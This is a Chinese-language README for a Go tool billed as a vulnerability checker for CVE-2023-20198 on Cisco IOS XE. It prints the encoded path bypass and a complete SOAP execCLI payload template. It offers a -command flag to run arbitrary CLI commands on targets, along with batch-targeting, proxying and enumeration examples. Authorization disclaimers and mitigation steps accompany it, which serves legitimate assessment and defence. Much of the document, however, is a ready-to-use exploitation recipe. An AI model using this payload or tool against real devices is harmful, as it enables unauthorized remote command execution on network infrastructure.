用于检测 Cisco IOS XE 设备中 CVE-2023-20198 的专业漏洞扫描器。测试易受攻击的 SOAP/XML 接口 (WSMA)。专为授权安全评估和网络审计设计。
仅限授权安全测试
本工具仅允许用于:
未经授权访问计算机系统是违法的。请务必在测试任何系统之前获得适当授权。
go install(推荐)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
二进制文件将安装到你的 $GOPATH/bin 目录(通常是 ~/go/bin)。
# 克隆仓库
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# 构建
go build -o cisco-cve-2023-20198-checker
# 安装(可选)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# 检查单个目标
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# 检查多个目标
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# 生成 HTML 报告
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
非常适合企业环境!支持:
# HTTP 代理
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5(SSH 隧道)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# 环境变量
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
详细代理配置请参见 PROXY_GUIDE.md。
| 标志 | 类型 | 默认值 | 描述 |
|---|---|---|---|
-target | string | - | 单个目标 IP/主机名 |
-targets-file | string | - | 包含目标的文件(每行一个) |
-port | int | 443 | HTTPS/SOAP 端口 |
-username | string | admin | SOAP 用户名 |
-password | string | - | 必需。SOAP 密码 |
-command | string | uname -a | 要执行的命令 |
-html | bool | false | 生成 HTML 报告 |
-timeout | int | 10 | 请求超时(秒) |
-skip-verify | bool | true | 跳过 SSL 验证 |
-proxy | string | - | 代理 URL(http://、https://、socks5://) |
# 基本漏洞检查
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# 自定义端口
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# 执行特定命令
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# 生成报告
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# 创建目标文件
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# 测试所有目标
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# 批量生成 HTML 报告
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# 网络枚举
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# 版本检测
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# 通过 HTTP 代理
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# 通过 SOCKS5 代理(SSH 隧道)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# 认证代理
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
CVE ID: CVE-2023-20198
CVSS 评分: 10.0(严重)
类型: 远程代码执行 (RCE)
影响: Cisco IOS XE Web UI (WSMA)
/%2577ebui_wsma_https(路径编码绕过)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
如果你的设备存在漏洞:
1. 禁用 WSMA(如果不需要)
no ip http server
no ip http secure-server
2. 使用 ACL 限制访问
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. 更新固件 - 应用最新的 Cisco 安全补丁
4. 启用强认证
aaa new-model
aaa authentication login default group tacacs+ local
5. 监控日志 - 检查可疑的 SOAP/HTTP 活动
# 标准构建
go build -o cisco-cve-2023-20198-checker
# 优化(更小的二进制文件)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# 交叉编译到不同平台
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ Cisco SOAP/XML 安全检查器 ║
║ 仅限教育和授权安全评估 ║
╚═══════════════════════════════════════════════════════════╝
[*] 命令: show version
[*] 端口: 443
[*] 超时: 10 秒
[1/1] 测试目标: 192.168.1.100:443
[*] 发送 SOAP 请求...
[+] 收到响应 (状态: 200)
[+] 成功!
╔═══════════════════════════════════════════════════════════╗
║ 批量结果 ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - 成功
Cisco IOS XE Software, Version 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ 摘要 ║
╚═══════════════════════════════════════════════════════════╝
总目标数: 1
成功: 1
失败: 0
专业安全评估报告,包含:
欢迎贡献!请:
MIT 许可证 - 参见 LICENSE 文件
本工具仅用于授权漏洞扫描。作者不对滥用行为负责。在测试不属于你的系统之前,请务必获得书面许可。
为安全社区而制作 🛡️